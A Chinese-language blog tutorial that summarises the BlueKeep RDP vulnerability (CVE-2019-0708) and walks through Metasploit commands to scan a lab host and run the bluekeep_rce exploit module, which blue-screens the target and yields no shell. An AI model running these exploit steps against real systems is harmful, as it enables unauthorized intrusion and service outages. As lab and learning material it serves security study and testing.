Metasploit -- CVE-2019-0708漏洞檢測及利用

“醫生,我得了嚴重的抑鬱症,你能給我看看嗎” “我們這有全市最搞笑的小丑,他應該能治好你的病” “醫生,我就是那個小丑!”

----  網易雲熱評

一、漏洞簡介

Windows系列服務器於2019年5月15號, 被爆出高危漏洞, 該漏洞影響範圍較廣, windows 2003、windows 2008、windows 2008R 2、windowsxp等系統都會遭到攻擊,該服務器漏洞利用方式是通過遠程桌面端口3389, RDP協議進行攻擊的。CVE-2019-0708漏洞是通過檢查用戶的身份認證,導致可以繞過認證, 不用任何的交互, 直接通過rdp協議進行連接發送惡意代碼執行命令到服務器中去。這個漏洞是今年來說危害嚴重性最大的漏洞,換句話說,該漏洞是“可傳播的”,這意味着任何利用該漏洞的惡意軟件都可能從受影響的計算機傳播到受影響的計算機,就像2017年Wanna Cry惡意軟件在全球蔓延一樣, 跟之前的勒索,永恆之藍病毒差不多。

 

二、漏洞檢測

1、打開Metasploit,搜索CVE-2019-0708

2、選擇auxiliary/scanner/rdp/cve_2019_0708_bluekeep,檢測漏洞是否存在

3、查看需要設置的參數show options

4、設置目標主機ip set rhosts 192.168.1.129

5、run,檢測出現The target is vulnerable,目標很脆弱,說明存在漏洞

 

三、漏洞利用

1、選擇攻擊模塊exploit/windows/rdp/cve_2019_0708_bluekeep_rce

2、查看攻擊目標的環境show targets

3、設置模塊需要的環境 set target 5

4、查看模塊需要的參數 show options

5、設置攻擊目標ip set rhosts 192.168.1.129

6、run,攻擊

 

7、目標主機出現藍屏

總結,理論上應該就取得了目標主機的shell,但是我的卻是藍屏,網上有的說多試幾次就好,有的說是設置的target問題,都試過了,但是我最終還是沒能成功。。。。

禁止非法,後果自負

歡迎關注公衆號:web安全工具庫

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章